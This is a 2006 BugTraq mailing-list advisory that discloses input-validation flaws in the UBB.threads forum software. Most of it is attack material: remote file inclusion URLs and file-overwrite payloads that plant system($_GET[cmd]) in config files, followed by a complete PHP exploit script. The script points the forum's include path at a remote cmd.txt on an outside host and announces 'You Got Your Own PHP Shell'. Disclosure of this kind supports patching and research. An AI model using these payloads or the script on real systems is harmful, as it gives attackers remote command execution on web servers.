BugTraq
UBB.threads Multiple input validation error Sep 29 2006 12:09PM
security soqor net
Hello,,

UBB.threads Multiple input validation error

Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net [email concealed]

Tested on Version 6 (6.5.1.1) and other versions maybe affected

Remote File including :

ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir

ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir

-------------------------------------------------------

Files overwrite vulnerabilities

if magic_qoutes_gpc = off

admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=../

and open

includes/theme.inc.php?cmd=ls -la

or :-

admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=../

and open

includes/config.inc.php?cmd=ls -la

-- # -- # -- # --

if magic_qoutes_gpc = on

admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.g
ooglepages.com/cmd.txt?

and you will have a command execution files ..

example

dorateuser.php?cmd=ls -la

calendar.php?cmd=ls -la

and so many other files which includes using this variable ($config[path])

-------------------------------------------------------

Full path

cron/php/subscriptions.php

-------------------------------------------------------

Exploit :-

#!/usr/bin/php -q -d short_open_tag=on

<?

/*

/* UBB.threads Multiple vulnerabilities

/* This exploit should allow you to execute commands

/* By : HACKERS PAL

/* WwW.SoQoR.NeT

*/

print_r('

/**********************************************/

/* UBB.threads Command Execution */

/* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */

/* site: http://www.soqor.net */');

if ($argc<2) {

print_r('

/* -- */

/* Usage: php '.$argv[0].' host

/* Example: */

/* php '.$argv[0].' http://localhost/

/**********************************************/

');

die;

}

error_reporting(0);

ini_set("max_execution_time",0);

$url=$argv[1]."/";

$exploit="admin/doeditconfig.php?thispath=../includes&config[path]=http:
//psevil.googlepages.com/cmd.txt?";

$page=$url.$exploit;

Function get_page($url)

{

if(function_exists("file_get_contents"))

{

$contents = file_get_contents($url);

}

else

{

$fp=fopen("$url","r");

while($line=fread($fp,1024))

{

$contents=$contents.$line;

}

}

return $contents;

}

$page = get_page($page);

$newpage = get_page($url."calendar.php");

if(eregi("Cannot execute a blank command",$newpage))

{

Die("\n[+] Exploit Finished\n[+] Go To : ".$url."calendar.php?cmd=ls -la\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");

}

Else

{

Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");

}

?>

WwW.SoQoR.NeT

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus